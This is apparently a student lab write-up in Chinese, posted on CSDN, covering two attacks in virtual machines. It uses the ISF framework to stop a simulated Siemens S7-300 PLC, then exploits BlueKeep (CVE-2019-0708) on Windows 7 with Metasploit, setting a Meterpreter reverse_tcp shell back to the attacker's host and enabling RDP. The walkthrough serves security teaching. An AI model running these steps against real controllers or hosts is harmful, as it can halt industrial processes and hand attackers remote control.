工业互联网安全:西门子S7-300启停和利用windows 7 cve-2019-0708漏洞

最新推荐文章于 2024-06-18 21:25:52 发布
最新推荐文章于 2024-06-18 21:25:52 发布
阅读量169 收藏
点赞数
文章标签: windows web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_76428823/article/details/135200326
版权

一.西门子S7-300启停

1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境

2.kali中安装工控漏洞利用框架 ISF

(1)在kali终端中使用命令:

git clone https://github.com/dark-lbp/isf/

(2)输入cd isf                 

(3)输入python2 isf.py                

(4)这时有可能会报错:缺少nmap模块,方法:

A.克隆下载nmap模块的包

git clone https://github.com/johanlundberg/python-nmap

B.进入python-nmap文件夹:cd python-nmap,使用命令python2 setup.py install

C.进入python2中import nmap发现没有报错了,使用exit()退出

D.回到上一级文件夹,继续执行 python2 isf.py命令进行安装

3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径

(1).使用serverdemo.exe模拟PLC设备,用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中

(2)在serverdemo.exe界面先点击start启动server

(3)可以查看到serverdemo.exe下面日志就显示server started

(4) 使用clientdemo.exe模拟主机,clientdemo.exe界面上填写上物理机ip

(5)clientdemo.exe界面上点击connect连接

(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)

4.打开ISF后,输入:

use exploits/plcs/siemens/s7_300_400_plc_control

5.show options

6.set target 物理机IP

7.run

这里显示 stop plc ,同时查看serverdemo.exe模拟器中的输出,可以发现已经停止

STOPàOK

        

二.利用windows 7 cve-2019-0708漏洞

环境准备

说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
    这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

1.开启Kali虚拟机和win7靶机

2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:

3.若3389没打开,可以右键计算机,选择属性

4.选择远程设置

5.选择允许远程连接

7.5.2  利用windows 7 cve-2019-0708漏洞案例

1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:

nmap 192.168.11.133(win7IP)

2.确认开启后启动msfconsole

3. 搜索漏洞:

search 0708

前两个模块,一个是扫描功能,一个是攻击功能。

4.使用攻击功能,也就是第二个模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

 

5.设置目标:

set rhost 被攻击ip     #设置win7ip

set rport 3389   

       

6.设置payload:

set payload windows/x64/meterpreter/reverse_tcp   #设置64位的payload如果是32位机器则不用加x64

7.设置攻击机:

set lhost 攻击者ip     #设置kali的ip 

set lport 4444           #设置攻击者的监听端口(端口可以随意更改)

8.输入:show targets,显示可以选择的靶机的架构

9.用于vm是15.5.1,所以可以选择target 3-5

10.选择target 3,进行尝试:

set target 3

11.进行攻击,运行:run

12.假如可以建立连接,输入:

run post/windows/manage/enable_rdp                               

 运行远程桌面模块

13.另开一个kali终端,输入:

rdesktop win7靶机IP

2022计网1班谢世亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
snap7
wisp01的博客
02-12 890
The Snap7 theatre (剧场、讲堂) The purpose of Snap7 is to fully integrate your PC station into a PLC network, without anybody sees the difference. To allow this, the Snap7 theater must be the same as the S...
工控安全| 西门子S7-300攻击分析
weixin_43977912的博客
01-10 2102
一、概述 随着等保2.0的普及,工控安全大家也越来越重视,研究工控安全的小伙伴也越来越多。工控安全主要包括工控设备私有协议的安全分析,工控设备固件系统安全以及工控设备应用程序安全等。西门子PLC广泛应用于工业控制系统,本文主要描述西门子PLC系列S7-300的攻击过程与思路,并介绍演示一些适合小伙伴们学习的工控工具和框架。如有错误之处,欢迎指正,共同学习进步。 二、环境描述 前几天疫情待在家,PLC的设备拿不到,但是咱的任务不能落下呀,我在网上找了一个好用的S7模拟器,压缩包打开如下: 其实我们需要用到的
最新工控安全 西门子S7-300攻击分析_plc300漏洞(2),2024年最新网络安全开发技巧
2401_84519907的博客
05-14 605
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
利用C#和Snap7工具模拟S7通信(包含DB地址讲解)
最新发布
zxy13826134783的博客
06-18 1245
但KepServerEx是收费的,而且模拟的DB块超过64就不行了,当然Snap7在本文中也是只能模拟DB1、DB2和DB3的数据,但Snap7提供了C#版的运行程序,完全可以根据需要修改源码完成要模拟的DB块(由于有一个项目需要,我已经尝试过修改源码成功模拟DB100、DB101、DB102和DB103的数据,后面有空在把代码分享出来)上图中第1个红色方框的十六进制地址为0000,第2个红色方框十六进制的地址为000F,第3个红色方框十六进制的地址为0012,地址排布相信你能看得懂。
S7 协议调试工具 & 模拟器 --snap7 demo server_partner_client
热门推荐
weixin_44112083的博客
05-11 1万+
1. S7协议的介绍:S7-与Profinet区别、Snap7通讯库介绍及下载、单边/双边通讯、客户端/服务端、同步/异步通讯;2. 服务端调试程序-demo server 使用;3. 客户端调试程序 -- demo client 使用
Snap7 Client
qqGHJ的博客
08-31 7296
   A PLC client is the most well-known object, almost all PLC communication        drivers on the market are clients. Into S7 world, LibNoDave, Prodave, SAPI-S7 (Simatic Net mn library) are clients. ...
snap7test.rar_3#7_C# s7 DB_Sharp7_sharp7和snap7_snap7 c
07-15
Sharp7是Snap7 Client的C#端口,它不是一个包装器,即你没有加载snap7.dll(或.so)的接口代码,但它是S7Protocol的纯C#实现。Sharp7被部署为单个源文件,其中包含一些类,您可以直接在.NET项目中使用与S7 PLC进行通信的类。 本项目工程实现了与PLC设备进行连接,并且可以成功地从PLC设备的DB读取数据和将数据正确写入PLC设备的DB。
西门子 PLC TCP 通信协议
abc
09-25 6331
flexmanager PLC 通信协议 http://www.flexem.cn/Index.html
C# snap7 OPC读写S7300 PLC DB块
MAILJMQ的博客
08-15 367
S7300 PLC OPC
QT SNAP7协议 demo
03-15
该程序是 QT用SNAP7写的 和西门子PLC 通讯的例子 ,可编辑。可打开。支持 对西门子PLC 任意区域 读写 bit,byte,word/Dword,Uint,float 等任意数据类型 。线程读取。是通讯的模板程序
snap7-express-server:一个简单的node.js表达REST服务器以写入siemens徽标
05-05
Snap7 Express服务器 一个简单的node.js表示REST服务器即可写入siemens徽标。 用法 一个端点打开大门。 $ curl --location --request GET ' http://localhost:3000 ' --header ' Authorization: Basic YWRtaW46c3VwZXJib2Nr ' 服务器已实现基本身份验证。 发展 首先安装node.js,然后在项目文件夹中运行npm install 。 此外,使用您的配置创建一个.env文件。 要启动服务器,请运行npm start或node index.js 。 配置参数 PORT=3000 PLC_IP=127.0.0.1 PLC_DELAY_TO_RESET=1000 PLC_DATABASE=1 SERVERS=http://localhost:3000 Port :
snap7库C++版本对PLC数据的读写
hhaijiuwo的博客
06-27 7815
Snap7库C++版本对西门子PLC数据的读取
西门子s7协议 android,工控协议 | 西门子S7协议学习分享
weixin_32244597的博客
05-28 1000
原标题:工控协议 | 西门子S7协议学习分享*本文作者:gongmo,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×1前言随着网络安全的发展,工控安全也越发的走进信息安全人员的工作当中。由于工控安全的文章较少,所以写一篇工控协议的分析文章,抛砖引玉,欢迎各位大神共同交流。,而且西门子的plc在工控行业也算是比较流行的设备了,所以这是一篇关于西门子s7协议的分析文章(适用于s7-30...
python snap7 plc_基于Snap7实现与西门子PLC通信(示例代码)
weixin_39911998的博客
03-01 1265
如果你对西门子PLC通信或者上位机开发稍微有一点研究的话,应该对Snap7有所耳闻。Snap7是一个基于以太网与西门子S7系列PLC通信的开源库,在世界领域应用很广。但也许是因为资料比较少,而且很多都是纯英文,在国内反而没有大规模的应用。作为一个技术开发人员,所有未知领域的事物都是值得探索的。于是花了一些时间,对Snap7做了一些研究,借此机会,给大家做一些分享,希望可以给对工作或学习中有这块需要...
Python通过snap7读取300PLC数据---仿真实现
Still_unknown的专栏
05-16 3846
Python通过snap7读取300PLC数据—仿真实现 电脑上Step7 5.6、python3.6、python_snap7-0.11、NetToPLCsim Version: 1.2.4.0 1.python中安装方法这里就重复了,网上有很多资料。 2.下载NetToPLCsim软件。NetToPLCsim是一款用于仿真硬件PLC地址模拟器,相当于一个桥梁,Python通过NetToPlCsim可以读写到Step7的Plcsim。软件如下图所示,点击add或modify填写本机的IP地址和仿真PLC的
基于Snap7实现与西门子PLC通信
xiketangAndy的博客
05-16 3795
​如果你对西门子PLC通信或者上位机开发稍微有一点研究的话,应该对Snap7有所耳闻。 Snap7是一个基于以太网与西门子S7系列PLC通信的开源库,在世界领域应用很广。但也许是因为资料比较少,而且很多都是纯英文,在国内反而没有大规模的应用。 作为一个技术开发人员,所有未知领域的事物都是值得探索的。于是花了一些时间,对Snap7做了一些研究,借此机会,给大家做一些分享,希望可以给对工作或学习中有这块需要的人,提供一些借鉴。 1. Snap7基础介绍 (1)Snap7作为一个世界级的开源库,有自己..
在VS中配置snap7并用snap7与PLC通信
工大机器人工作室
07-30 6870
前言 之前实验室的小车使用OPC与上位机通信,但由于年代已久,师兄们写的代码已看不懂加上OPC配置比较麻烦,故现在现在采用snap7进行开发。 snap7介绍 Snap7是一个基于以太网与西门子S7系列PLC通信的开源库,在世界领域应用很广。但也许是因为资料比较少,而且很多都是纯英文,在国内反而没有大规模的应用。 snap7官网有具体的说明以及相应的论坛。 vs上snap7配置 首先去这个网址下载snap7的开发包https://sourceforge.net/projects/snap7/files/1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值